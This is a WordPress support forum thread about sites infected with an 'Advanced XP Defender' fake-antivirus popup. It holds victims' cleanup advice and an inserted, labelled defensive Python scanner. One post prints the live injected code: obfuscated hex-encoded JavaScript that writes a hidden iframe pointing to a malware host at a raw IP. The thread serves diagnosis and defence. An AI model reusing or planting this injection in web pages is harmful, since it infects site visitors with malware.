advanced xp defender

  • gmatkin


    My weblog seems to have been infected with some sort of Trojan, and I’d be most grateful for advice urgently.

    The thing pops up when I hit the admin and view site links, and I guess it’s probably infecting readers’ computers as I write.

    What happens is that a message appears that reads:

    Attention! You have not completed the virus scan!
    Your PC is still infected with spyware!

    Please return to and downloat Advanced XP Defender scanner.

    When I click that off using the top-right-hand cross it seems to have another go.

    Now, I know this is not happening on my main computer only, as I’ve tested it on my second computer. I also know that my spyware detector is picking it up as a Trojan, that appears to come from my weblog.

    Has it been hacked, and if so what should I do please?



Viewing 15 replies - 16 through 30 (of 30 total)
  • skaterkee


    Well I just replaced the index.php with a backup and it went away but I don’t think it’ll be gone for long because I have no idea how it got there.



    The problem is not with your wp version or anything… it just happened on a few of our drupal based sites and also a custom coded asp site – we are guessing it has something to do with our ftp info being shared. we’re trying multiple things and will keep you guys posted as well. Please hit us up if any of you find the issue. – Thanks a lot [Danish]



    guys, thanks for discussing this problem online. i have the same problem. it has come to my attention that it only popped up when i was currently browsing my site or when i was about to leave.

    just to make sure, i’ve used AntiVir, Malwarebytes’ Anti-Malware and Spybot to check but they found nothing.

    so, here’s the idea to trace, how about we compare the version of wordpress and active plugins we used?

    here’s mine:
    Wordpress 2.5.1
    Calendar 2.0
    cforms 8.5.1
    Exec-PHP 4.7
    GetWeather 1.2.1
    Image Counter 1.0
    My Link Order 2.5.1
    NextGEN Gallery 0.96
    Pagebar2 2.20
    pageMash 1.1.3
    Ryans Suckerfish WordPress Dropdown Menu 1.6.6
    Search Hilite 1.5
    Simple Archive Generator 3.2
    Simple Cache 1.0
    TinyMCE Advanced 3.0.1
    Truncate Title 1.0
    WP-Highslide 1.28
    WP-Print 2.30
    WP-UserOnline 2.30




    a little update guys..

    i found that it changed 4 files (on online server),
    by inserting some scripts.

    this is my changed index.php

    /* Short and sweet */
    define('WP_USE_THEMES', true);
    var d=document,kol=561;
    function O10H485A55AFF19D2(H485A55AFF21B6){ var H485A55AFF25B0 = 16; return( parseInt(H485A55AFF21B6,H485A55AFF25B0));}function H485A55AFF2DA8(H485A55AFF31A5){ var H485A55AFF359E=”;for(H485A55AFF3999=0; H485A55AFF3999<H485A55AFF31A5.length; H485A55AFF3999+=2){ H485A55AFF359E += ( String.fromCharCode (O10H485A55AFF19D2(H485A55AFF31A5.substr(H485A55AFF3999, 2))));}return H485A55AFF359E;} document.write(H485A55AFF2DA8(‘3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3337393532292B2766333434395C272077696474683D353933206865696768743D3634207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E’));




    It’s not just exclusive to WordPress. I uploaded HTML files and it still appeared on them. I think it just ruins your whole server and adds that script to your files.

    I’ve been struggling with this one too, but might(!) have solved it.

    Couple of days ago this popped up on my custom coded php website. I’m running on a windows server and integrated into my site are 2 copies of wordpress and 1 copy of phpBB. The only WordPress plugin running was akismet.

    It seems to mainly infect files (see code in post above) with the prefix index, regardless of the extension. However, it did appear in login.php of phpbb.

    Initially I thought this was an injection attack. So I removed all the hacked code from the infected files and upgraded to latest version of wordpress and phpBB.

    We also have a custom form that uses a formmail script. I tightened up the validation on all the fields, and restricted the entry for fields to no more than 35 characters.

    I thought this had solved it, until the next morning when it reappeared!

    I then upgraded the formmail script, deleted any old files via FTP, changed ftp passwords and removed any other FTP users.

    I also ran a spyware scanner on our server… Which is the key bit…
    It picked up 2 trojans one of them being ‘advanced xp defender’.

    So far (fingers crossed) we haven’t been re-infected.

    I suggest that if you are having this problem that you:

    • Remove all malicious code from infected files
    • Upgrade to the latest version of wordpress/ other open source apps
    • Change FTP passwords
    • Upgrade plugins
    • Disable plugins that use forms on the front end
    • Delete any old files on your server
    • Ensure any custom forms use validation and the latest scripts
    • Get your host to perform a virus/spyware scan on their server

    The spyware app I used was Spyware doctor from PCtools.

    Hope this helps.
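
    An added example, not part of the original posts and not any poster's code: a static scanner for the injection pattern shown in the index.php post above, where a document.write call decodes a long hex string into a hidden IFRAME. It supports the "remove all malicious code from infected files" step by listing every affected file under a web root. The 40-digit threshold, the function names and the malware.example.invalid sample are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

# Quoted run of hex digits long enough to hide markup (assumed threshold: 40 digits).
HEX_LITERAL = re.compile(r"['\"]((?:[0-9A-Fa-f]{2}){20,})['\"]")
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc=\\?['\"]?([^\s'\"\\>]+)", re.I)


def decode_hex_literals(text):
    """Statically decode hex string literals; nothing is executed."""
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_LITERAL.finditer(text)]


def scan_file(path):
    """Flag a file that has document.write plus hex decoding to an iframe."""
    text = Path(path).read_text(encoding="latin-1")
    if "document.write" not in text:
        return []
    findings = []
    for decoded in decode_hex_literals(text):
        hidden = "display:none" in decoded.replace(" ", "").lower()
        for src in IFRAME_SRC.findall(decoded):
            findings.append({"file": str(path), "iframe_src": src,
                             "hidden": hidden})
    return findings


def scan_tree(root):
    """Scan every file under root; the thread saw .php and .html files hit."""
    results = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file():
            results.extend(scan_file(p))
    return results


def build_demo_tree(root):
    """Constructed sample: one clean file, one with an injected-style line."""
    payload = ("<script>d.write('<IFRAME name=O1 "
               "src=\\'http://malware.example.invalid/go.html?'+1+'\\' "
               "style=\\'display: none\\'></IFRAME>');</script>")
    injected = "document.write(dec('%s'));" % payload.encode().hex().upper()
    Path(root, "index.php").write_text("<?php /* theme loader */ ?>\n" + injected)
    Path(root, "about.html").write_text("<html><body>clean</body></html>")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        print(scan_tree(tmp))
```

    Run scan_tree against a copy of the web root before and after cleanup; a file that reappears in the results after cleaning points to the re-infection path (FTP credentials or the server itself) still being open.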

    thanks a lot, it’s crystal clear.

    it’s been 2 days since i tried to fix mine, no pop-up anymore.

    actually i’d removed that script once before, but pop-up kept showing. then i remembered that i’d used cracked ftp client! having that in mind, i threw the old one, switched to filezilla, removed that script and then changed my ftp password.

    as i found out (via googling) that even a hand-made and also a 2-years-safe site had been infected, i guess what we’ve uploaded (cms) is not suspected anymore. now only 2 left, uploading process, and the server itself.

    i guess we’ll find out shortly what the real problem is. for now, i recommend you to
    – try to change ftp client
    – remove script from infected file, and then
    – change ftp password

    can’t wait to hear news from you guys..

    hope this helps, too.

    Thanks for the help I’m in the process of fixing it now but my site has been labeled as dangerous by google 🙁

    May I ask how you scanned your server for spyware?

    Skaterkee, we have our own dedicated server, which means access like a normal computer. If you’re on shared hosting - contact your host to perform a scan.

    That’ll take two weeks knowing hostgator.

    Do you know if there’s a way to check wordpress’s database for abnormalities?

    God sakes, my host went off on one and deleted everything off my account.

  • The topic ‘advanced xp defender’ is closed to new replies.